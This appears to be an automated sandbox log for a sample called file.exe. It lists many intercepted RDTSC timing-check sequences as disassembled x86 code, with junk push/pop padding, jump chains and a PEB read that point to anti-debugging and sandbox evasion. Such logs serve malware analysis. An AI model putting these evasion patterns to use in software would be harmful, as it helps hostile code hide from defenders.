Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA63 second address: 133FA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA68 second address: 133FA7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F81013DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133FA7C second address: 133FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 133F5D1 second address: 133F5E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F81013DA8h 0x00000008 push eax 0x00000009 jng 00007F1F81013DA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1356897 second address: 13568AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13568AA second address: 13568BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1F81013DA6h 0x00000009 jl 00007F1F81013DA6h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271A72 second address: 1271A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F80D77656h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271A92 second address: 1271AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 ja 00007F1F81013DAAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271AA3 second address: 1271AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126FFDA second address: 126FFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B803 second address: 135B807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135B807 second address: 135B82B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1F81013DB5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BAF8 second address: 135BB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F1F80D77648h 0x0000000b pop eax 0x0000000c jo 00007F1F80D77675h 0x00000012 jmp 00007F1F80D77653h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1F80D7764Ah 0x0000001e jmp 00007F1F80D7764Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BC95 second address: 135BC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BC99 second address: 135BCA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135BCA5 second address: 135BCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1F81013DA6h 0x0000000a pop ebx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C0A7 second address: 135C0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C237 second address: 135C258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F81013DB4h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C258 second address: 135C270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D77650h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135C270 second address: 135C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F1F81013DB2h 0x0000000e popad 0x0000000f pushad 0x00000010 jnc 00007F1F81013DA8h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jo 00007F1F81013DA6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FCC0 second address: 135FCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FCC4 second address: 135FCCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135FCCA second address: 135FCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1362DA2 second address: 1362DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1362DB5 second address: 1362DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F80D7764Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1367C34 second address: 1367C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1367C4F second address: 1367C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F1F80D77646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1F80D7764Bh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5BF4 second address: 13A5C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F1F81013DB5h 0x0000000f pop esi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5A98 second address: 13A5A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5A9E second address: 13A5AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A5AA4 second address: 13A5AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A7F4B second address: 13A7F71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F1F81013DA6h 0x00000009 pop edx 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1F81013DB3h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4371 second address: 13B4375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4375 second address: 13B4396 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F81013DA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F81013DB1h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4396 second address: 13B43A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43A6 second address: 13B43BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F81013DAFh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43BE second address: 13B43C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43C8 second address: 13B43CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B43CE second address: 13B43D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B63F6 second address: 13B6406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F1F81013DAAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B6406 second address: 13B6410 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F80D7764Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A91F second address: 147A923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A923 second address: 147A931 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A931 second address: 147A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147A937 second address: 147A93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147AD4E second address: 147AD5C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147AD5C second address: 147AD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147AD60 second address: 147AD70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jbe 00007F1F81013DB2h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B052 second address: 147B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B058 second address: 147B05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B05C second address: 147B068 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B068 second address: 147B07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B07A second address: 147B07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B07E second address: 147B084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B1FE second address: 147B202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147B202 second address: 147B208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147DF9A second address: 147DFB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77652h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E2A3 second address: 147E2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E2BF second address: 147E2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E2C3 second address: 147E322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000004h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F1F81013DA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1A54h] 0x0000002d xor edx, 5C3E5B09h 0x00000033 mov edx, dword ptr [ebp+122D27BAh] 0x00000039 call 00007F1F81013DA9h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1F81013DB5h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E322 second address: 147E39C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F80D7765Ah 0x00000008 jmp 00007F1F80D77654h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jo 00007F1F80D77657h 0x00000017 jmp 00007F1F80D77651h 0x0000001c jmp 00007F1F80D77653h 0x00000021 popad 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 pushad 0x00000027 jmp 00007F1F80D77659h 0x0000002c push edx 0x0000002d jbe 00007F1F80D77646h 0x00000033 pop edx 0x00000034 popad 0x00000035 mov eax, dword ptr [eax] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E39C second address: 147E3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E3A0 second address: 147E3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147E3A4 second address: 147E3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F80F second address: 147F819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F819 second address: 147F82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F1F81013DAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F82D second address: 147F839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F839 second address: 147F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F83D second address: 147F84D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007F1F80D77652h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 147F84D second address: 147F853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 148159B second address: 148159F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 148159F second address: 14815A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815A5 second address: 14815AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815AB second address: 14815C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815C9 second address: 14815CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14815CD second address: 14815E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1481151 second address: 1481155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1481155 second address: 1481159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14830AF second address: 14830BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760007E second address: 7600090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000030h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600090 second address: 7600094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600094 second address: 76000A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76000A4 second address: 76000B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76000B6 second address: 76001A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b jmp 00007F1F81013DB7h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 call 00007F1F81013DB4h 0x00000017 pushfd 0x00000018 jmp 00007F1F81013DB2h 0x0000001d or si, 5658h 0x00000022 jmp 00007F1F81013DABh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 mov esi, ebx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007F1F81013DB0h 0x00000033 pushfd 0x00000034 jmp 00007F1F81013DB2h 0x00000039 xor eax, 086CE7E8h 0x0000003f jmp 00007F1F81013DABh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007F1F81013DB6h 0x0000004c mov ebx, dword ptr [eax+10h] 0x0000004f pushad 0x00000050 mov edx, esi 0x00000052 pushad 0x00000053 call 00007F1F81013DB8h 0x00000058 pop esi 0x00000059 popad 0x0000005a popad 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d push ecx 0x0000005e call 00007F1F81013DB9h 0x00000063 pop ecx 0x00000064 pop edx 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76001A8 second address: 76001CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov bx, BAAAh 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007F1F80D7764Bh 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76001CB second address: 7600212 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F81013DB9h 0x00000008 jmp 00007F1F81013DABh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov esi, dword ptr [759B06ECh] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a call 00007F1F81013DB2h 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600212 second address: 7600239 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1F80D7764Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 126Ch 0x0000000e popad 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1F80D7764Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600239 second address: 7600299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1F81014C1Bh 0x0000000f jmp 00007F1F81013DB6h 0x00000014 xchg eax, edi 0x00000015 jmp 00007F1F81013DB0h 0x0000001a push eax 0x0000001b jmp 00007F1F81013DABh 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1F81013DB5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600299 second address: 760029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760029F second address: 76002C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [75980B60h] 0x0000000e mov eax, 75F3E5E0h 0x00000013 ret 0x00000014 jmp 00007F1F81013DAFh 0x00000019 push 00000044h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cx, bx 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76002C7 second address: 76002EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, C425h 0x00000007 mov ah, 7Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1F80D77658h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76002EE second address: 760031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F1F81013DB6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, ecx 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
